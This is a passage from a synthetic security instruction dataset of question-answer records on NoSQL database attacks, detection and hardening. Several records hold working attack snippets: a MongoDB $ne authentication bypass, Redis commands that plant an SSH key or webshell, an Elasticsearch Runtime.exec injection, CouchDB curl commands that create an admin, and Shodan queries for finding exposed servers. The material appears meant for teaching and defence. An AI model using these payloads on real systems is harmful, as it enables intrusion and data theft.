Modern frameworks may still be vulnerable.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164948Z", "updated_at": "2025-12-17T19:35:42.164948Z"} +{"id": "trtp-6b9de40b1e73", "instruction": "What is the syntax for MongoDB Injection?", "output": "Example of MongoDB Injection:\n\n```sql\n// Authentication bypass:\n// Original: db.users.find({username: input, password: input})\n// Payload: {\"username\": \"admin\", \"password\": {\"$ne\": \"\"}}\n\n// $where injection:\ndb.users.find({$where: \"this.password.match(/^a.*/)\"})\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164958Z", "updated_at": "2025-12-17T19:35:42.164958Z"} +{"id": "trtp-6c3c0b3eefbc", "instruction": "Explain MongoDB Authentication and Authorization from a security perspective.", "output": "MongoDB authentication secures database access, while role-based authorization controls permissions. Default configurations are often insecure with authentication disabled and databases exposed to the network.\n\nSecurity Relevance: MongoDB historically defaulted to no authentication, leading to thousands of exposed databases. 
Even with authentication, overprivileged roles enable data theft and manipulation.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166825Z", "updated_at": "2025-12-17T19:35:42.166825Z"} +{"id": "trtp-549a7d4b924d", "instruction": "What are the main parts of MongoDB Authentication and Authorization that security teams should understand?", "output": "MongoDB Authentication and Authorization consists of the following key components:\n\n- Authentication mechanisms (SCRAM, x509)\n- Role-based access control\n- Built-in roles (read, readWrite, dbAdmin)\n- Custom roles\n- Authentication database", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166845Z", "updated_at": "2025-12-17T19:35:42.166845Z"} +{"id": "trtp-3bd2b9d2a4f9", "instruction": "Why is MongoDB Authentication and Authorization important for database security?", "output": "MongoDB historically defaulted to no authentication, leading to thousands of exposed databases. 
Even with authentication, overprivileged roles enable data theft and manipulation.\n\nCommon attack vectors include:\n- Access unauthenticated MongoDB instances\n- Privilege escalation through role abuse\n- Credential brute forcing\n- Database enumeration without auth", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166860Z", "updated_at": "2025-12-17T19:35:42.166860Z"} +{"id": "trtp-144b440675b8", "instruction": "What threats are associated with MongoDB Authentication and Authorization?", "output": "Attack techniques involving MongoDB Authentication and Authorization:\n\n- Access unauthenticated MongoDB instances\n- Privilege escalation through role abuse\n- Credential brute forcing\n- Database enumeration without auth\n\nDefenders can detect these attacks by:\n- Connections without authentication\n- Role assignment changes\n- Failed authentication attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166874Z", "updated_at": "2025-12-17T19:35:42.166874Z"} +{"id": "trtp-7447cf434263", "instruction": "What indicators reveal malicious activity involving MongoDB Authentication and Authorization?", "output": "Methods for detecting MongoDB 
Authentication and Authorization attacks or anomalies:\n\n- Connections without authentication\n- Role assignment changes\n- Failed authentication attempts\n- Admin database access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166885Z", "updated_at": "2025-12-17T19:35:42.166885Z"} +{"id": "trtp-8f3c09d630e2", "instruction": "How can organizations protect against MongoDB Authentication and Authorization?", "output": "Security controls and preventive measures for MongoDB Authentication and Authorization:\n\n- Always enable authentication\n- Use SCRAM-SHA-256\n- Apply principle of least privilege\n- Bind to localhost unless needed\n\nMongoDB historically defaulted to no authentication, leading to thousands of exposed databases. 
Even with authentication, overprivileged roles enable data theft and manipulation.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166897Z", "updated_at": "2025-12-17T19:35:42.166897Z"} +{"id": "trtp-4eb34a827c85", "instruction": "What is the syntax for MongoDB Authentication and Authorization?", "output": "Example of MongoDB Authentication and Authorization:\n\n```sql\n// Enable authentication in mongod.conf:\nsecurity:\n authorization: enabled\n\n// Create user with minimal privileges:\ndb.createUser({\n user: \"appuser\",\n pwd: \"strong_password\",\n roles: [{role: \"readWrite\", db: \"appdb\"}]\n})\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166907Z", "updated_at": "2025-12-17T19:35:42.166907Z"} +{"id": "trtp-1c86ac9e9c51", "instruction": "How does Redis Security Vulnerabilities work and what are its security implications?", "output": "Redis is an in-memory data store often exposed without authentication. Redis commands like CONFIG, EVAL, and DEBUG enable arbitrary file writes, code execution, and system compromise.\n\nSecurity Relevance: Thousands of Redis instances are exposed on the internet without authentication. 
A single connection enables data theft, cryptomining, and full server compromise through known techniques.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168663Z", "updated_at": "2025-12-17T19:35:42.168663Z"} +{"id": "trtp-b6ce52423292", "instruction": "What are the main parts of Redis Security Vulnerabilities that security teams should understand?", "output": "Redis Security Vulnerabilities consists of the following key components:\n\n- Authentication (requirepass)\n- CONFIG SET command\n- EVAL Lua scripting\n- DEBUG commands\n- Replication abuse", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168684Z", "updated_at": "2025-12-17T19:35:42.168684Z"} +{"id": "trtp-636ea02cff26", "instruction": "Why is Redis Security Vulnerabilities important for database security?", "output": "Thousands of Redis instances are exposed on the internet without authentication. 
A single connection enables data theft, cryptomining, and full server compromise through known techniques.\n\nCommon attack vectors include:\n- SSH key injection\n- Webshell writing\n- Crontab injection\n- Lua code execution (EVAL)\n- Replication-based attacks", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168700Z", "updated_at": "2025-12-17T19:35:42.168700Z"} +{"id": "trtp-d99eceed0e79", "instruction": "How do attackers abuse Redis Security Vulnerabilities?", "output": "Attack techniques involving Redis Security Vulnerabilities:\n\n- SSH key injection\n- Webshell writing\n- Crontab injection\n- Lua code execution (EVAL)\n- Replication-based attacks\n\nDefenders can detect these attacks by:\n- CONFIG SET commands\n- Unusual dir/dbfilename changes\n- EVAL execution", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168714Z", "updated_at": "2025-12-17T19:35:42.168714Z"} +{"id": "trtp-75f6f37567b6", "instruction": "What indicators reveal malicious activity involving Redis Security Vulnerabilities?", "output": "Methods for detecting Redis Security Vulnerabilities attacks or anomalies:\n\n- CONFIG SET commands\n- Unusual dir/dbfilename changes\n- EVAL execution\n- 
File writes outside data directory\n- Replication configuration changes", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168727Z", "updated_at": "2025-12-17T19:35:42.168727Z"} +{"id": "trtp-ef64b8ca485d", "instruction": "What preventive measures address Redis Security Vulnerabilities vulnerabilities?", "output": "Security controls and preventive measures for Redis Security Vulnerabilities:\n\n- Enable requirepass authentication\n- Bind to localhost only\n- Rename/disable dangerous commands\n- Use ACLs (Redis 6+)\n- Network segmentation\n\nThousands of Redis instances are exposed on the internet without authentication. A single connection enables data theft, cryptomining, and full server compromise through known techniques.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168740Z", "updated_at": "2025-12-17T19:35:42.168740Z"} +{"id": "trtp-4d4cd196bf00", "instruction": "Provide a code example for Redis Security Vulnerabilities.", "output": "Example of Redis Security Vulnerabilities:\n\n```sql\n# SSH key injection attack:\nCONFIG SET dir /root/.ssh/\nCONFIG SET dbfilename authorized_keys\nSET payload \"\\n\\nssh-rsa AAAA... 
attacker@evil\\n\\n\"\nSAVE\n\n# Webshell via Redis:\nCONFIG SET dir /var/www/html/\nCONFIG SET dbfilename shell.php\nSET payload \"\"\nSAVE\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168750Z", "updated_at": "2025-12-17T19:35:42.168750Z"} +{"id": "trtp-c67883b228e2", "instruction": "What do security professionals need to know about Elasticsearch Security?", "output": "Elasticsearch provides powerful search capabilities but historically lacked authentication. Injection in queries, exposed management APIs, and misconfigured clusters enable data theft and system compromise.\n\nSecurity Relevance: Elasticsearch clusters often contain sensitive data (logs, user data, analytics). Exposed clusters enable data theft. 
Scripting features can enable code execution.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170470Z", "updated_at": "2025-12-17T19:35:42.170470Z"} +{"id": "trtp-0c4b7263538f", "instruction": "Describe the technical aspects of Elasticsearch Security.", "output": "Elasticsearch Security consists of the following key components:\n\n- X-Pack Security (authentication)\n- Query DSL injection\n- REST API exposure\n- Cluster management APIs\n- Script execution", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170511Z", "updated_at": "2025-12-17T19:35:42.170511Z"} +{"id": "trtp-f698194802a4", "instruction": "How can Elasticsearch Security lead to database security incidents?", "output": "Elasticsearch clusters often contain sensitive data (logs, user data, analytics). Exposed clusters enable data theft. 
Scripting features can enable code execution.\n\nCommon attack vectors include:\n- Unauthenticated data access\n- Index enumeration\n- Script injection (older versions)\n- Cluster management manipulation\n- Snapshot theft", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170527Z", "updated_at": "2025-12-17T19:35:42.170527Z"} +{"id": "trtp-7815eb7d427c", "instruction": "How can adversaries exploit Elasticsearch Security?", "output": "Attack techniques involving Elasticsearch Security:\n\n- Unauthenticated data access\n- Index enumeration\n- Script injection (older versions)\n- Cluster management manipulation\n- Snapshot theft\n\nDefenders can detect these attacks by:\n- Unauthenticated API access\n- Scripted query patterns\n- Bulk data access", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170542Z", "updated_at": "2025-12-17T19:35:42.170542Z"} +{"id": "trtp-8e2462c8da35", "instruction": "What indicators reveal malicious activity involving Elasticsearch Security?", "output": "Methods for detecting Elasticsearch Security attacks or anomalies:\n\n- Unauthenticated API access\n- Scripted query patterns\n- Bulk data access\n- Management API calls\n- Unusual index access patterns", 
"category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170554Z", "updated_at": "2025-12-17T19:35:42.170554Z"} +{"id": "trtp-fb4df138b735", "instruction": "How can organizations protect against Elasticsearch Security?", "output": "Security controls and preventive measures for Elasticsearch Security:\n\n- Enable X-Pack security\n- Disable scripting if not needed\n- Network segmentation\n- API access controls\n- Audit logging\n\nElasticsearch clusters often contain sensitive data (logs, user data, analytics). Exposed clusters enable data theft. Scripting features can enable code execution.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170566Z", "updated_at": "2025-12-17T19:35:42.170566Z"} +{"id": "trtp-3112426598c6", "instruction": "What does Elasticsearch Security look like in SQL?", "output": "Example of Elasticsearch Security:\n\n```sql\n// Scripted field injection (older versions):\n{\n \"script_fields\": {\n \"pwned\": {\n \"script\": \"java.lang.Runtime.getRuntime().exec('whoami')\"\n }\n }\n}\n\n// Data exfiltration query:\nGET /_all/_search?q=password:*\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": 
"database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170576Z", "updated_at": "2025-12-17T19:35:42.170576Z"} +{"id": "trtp-97ee90bdf2c7", "instruction": "What do security professionals need to know about CouchDB Security?", "output": "CouchDB is a document database accessible via HTTP REST API. Authentication misconfiguration, admin party mode, and view function injection create security vulnerabilities in CouchDB deployments.\n\nSecurity Relevance: CouchDB's Admin Party mode allows anyone to become admin. View functions written in JavaScript can be injected. HTTP API exposure enables easy exploitation.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172419Z", "updated_at": "2025-12-17T19:35:42.172419Z"} +{"id": "trtp-d7143a17d77e", "instruction": "What are the main parts of CouchDB Security that security teams should understand?", "output": "CouchDB Security consists of the following key components:\n\n- Admin Party mode (no auth)\n- Cookie authentication\n- User document manipulation\n- View function injection\n- Replication security", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": 
"components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172440Z", "updated_at": "2025-12-17T19:35:42.172440Z"} +{"id": "trtp-740dcf41df0d", "instruction": "What security risks are associated with CouchDB Security?", "output": "CouchDB's Admin Party mode allows anyone to become admin. View functions written in JavaScript can be injected. HTTP API exposure enables easy exploitation.\n\nCommon attack vectors include:\n- Admin Party exploitation\n- Admin credential creation\n- View function injection\n- Database enumeration\n- Replication data theft", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172454Z", "updated_at": "2025-12-17T19:35:42.172454Z"} +{"id": "trtp-31faf020dc9d", "instruction": "What are common attack techniques involving CouchDB Security?", "output": "Attack techniques involving CouchDB Security:\n\n- Admin Party exploitation\n- Admin credential creation\n- View function injection\n- Database enumeration\n- Replication data theft\n\nDefenders can detect these attacks by:\n- Unauthenticated admin access\n- Admin creation attempts\n- View function modifications", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": 
null, "flags": []}, "created_at": "2025-12-17T19:35:42.172468Z", "updated_at": "2025-12-17T19:35:42.172468Z"} +{"id": "trtp-11687f51e1b7", "instruction": "How do you detect exploitation of CouchDB Security?", "output": "Methods for detecting CouchDB Security attacks or anomalies:\n\n- Unauthenticated admin access\n- Admin creation attempts\n- View function modifications\n- Unusual replication patterns\n- _config endpoint access", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172489Z", "updated_at": "2025-12-17T19:35:42.172489Z"} +{"id": "trtp-eee1e0176db6", "instruction": "How can organizations protect against CouchDB Security?", "output": "Security controls and preventive measures for CouchDB Security:\n\n- Disable Admin Party immediately\n- Strong admin credentials\n- Bind to localhost\n- Validate view functions\n- Enable audit logging\n\nCouchDB's Admin Party mode allows anyone to become admin. View functions written in JavaScript can be injected. 
HTTP API exposure enables easy exploitation.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172502Z", "updated_at": "2025-12-17T19:35:42.172502Z"} +{"id": "trtp-05801c7ad489", "instruction": "What does CouchDB Security look like in SQL?", "output": "Example of CouchDB Security:\n\n```sql\n// Check for Admin Party (no auth):\ncurl http://target:5984/_users/_all_docs\n\n// Create admin user in Admin Party:\ncurl -X PUT http://target:5984/_config/admins/hacker -d '\"password\"'\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172512Z", "updated_at": "2025-12-17T19:35:42.172512Z"} +{"id": "trtp-160954a04513", "instruction": "How does NoSQL Database Exposure work and what are its security implications?", "output": "NoSQL databases are frequently exposed to the internet without authentication. Shodan and similar tools reveal thousands of exposed MongoDB, Redis, Elasticsearch, and CouchDB instances containing sensitive data.\n\nSecurity Relevance: Mass exploitation of exposed NoSQL databases is common. 
Attackers use automated tools to find and exploit exposed instances for data theft, ransomware, and cryptomining.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174235Z", "updated_at": "2025-12-17T19:35:42.174235Z"} +{"id": "trtp-5bae01145ba2", "instruction": "What are the main parts of NoSQL Database Exposure that security teams should understand?", "output": "NoSQL Database Exposure consists of the following key components:\n\n- Internet-facing databases\n- Default port exposure (27017, 6379, 9200)\n- Authentication disabled by default\n- Cloud misconfiguration\n- Container security gaps", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174255Z", "updated_at": "2025-12-17T19:35:42.174255Z"} +{"id": "trtp-81ece7369701", "instruction": "What security risks are associated with NoSQL Database Exposure?", "output": "Mass exploitation of exposed NoSQL databases is common. 
Attackers use automated tools to find and exploit exposed instances for data theft, ransomware, and cryptomining.\n\nCommon attack vectors include:\n- Automated internet scanning\n- Data theft from exposed instances\n- Database ransom attacks\n- Cryptominer deployment\n- Data destruction/vandalism", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174271Z", "updated_at": "2025-12-17T19:35:42.174271Z"} +{"id": "trtp-4dd37c4145f4", "instruction": "How do attackers abuse NoSQL Database Exposure?", "output": "Attack techniques involving NoSQL Database Exposure:\n\n- Automated internet scanning\n- Data theft from exposed instances\n- Database ransom attacks\n- Cryptominer deployment\n- Data destruction/vandalism\n\nDefenders can detect these attacks by:\n- External connection attempts\n- Unauthorized database access\n- Port scanning indicators", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174285Z", "updated_at": "2025-12-17T19:35:42.174285Z"} +{"id": "trtp-8494640edf2f", "instruction": "What indicators reveal malicious activity involving NoSQL Database Exposure?", "output": "Methods for detecting NoSQL Database Exposure attacks or anomalies:\n\n- External connection attempts\n- 
Unauthorized database access\n- Port scanning indicators\n- Data deletion patterns\n- Cryptocurrency mining processes", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174297Z", "updated_at": "2025-12-17T19:35:42.174297Z"} +{"id": "trtp-158083d17509", "instruction": "What security controls mitigate NoSQL Database Exposure risks?", "output": "Security controls and preventive measures for NoSQL Database Exposure:\n\n- Never expose databases to internet\n- Bind to localhost or private IPs\n- Enable authentication\n- Use firewall rules\n- Regular exposure scanning\n\nMass exploitation of exposed NoSQL databases is common. 
Attackers use automated tools to find and exploit exposed instances for data theft, ransomware, and cryptomining.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174309Z", "updated_at": "2025-12-17T19:35:42.174309Z"} +{"id": "trtp-509c15d88a95", "instruction": "What is the syntax for NoSQL Database Exposure?", "output": "Example of NoSQL Database Exposure:\n\n```sql\n# Shodan searches for exposed databases:\n# MongoDB: port:27017 product:MongoDB\n# Redis: port:6379 product:Redis\n# Elasticsearch: port:9200 product:Elasticsearch\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174319Z", "updated_at": "2025-12-17T19:35:42.174319Z"} +{"id": "trtp-d881da7b4121", "instruction": "What do security professionals need to know about Database Principle of Least Privilege?", "output": "Least privilege ensures database accounts have only the minimum permissions necessary for their function. Application accounts should never have DBA privileges. Separate accounts for different functions limits breach impact.\n\nSecurity Relevance: Overprivileged accounts amplify breach impact. SQL injection against a DBA account enables complete database compromise. 
Least privilege contains damage from compromised credentials.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176047Z", "updated_at": "2025-12-17T19:35:42.176047Z"} +{"id": "trtp-6a27b209e6e4", "instruction": "What elements make up Database Principle of Least Privilege?", "output": "Database Principle of Least Privilege consists of the following key components:\n\n- Account permission granularity\n- Role-based access control\n- Application vs admin accounts\n- Schema-level permissions\n- Object-level permissions", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176067Z", "updated_at": "2025-12-17T19:35:42.176067Z"} +{"id": "trtp-432bd4bbc3c0", "instruction": "From a security perspective, why should defenders understand Database Principle of Least Privilege?", "output": "Overprivileged accounts amplify breach impact. SQL injection against a DBA account enables complete database compromise. 
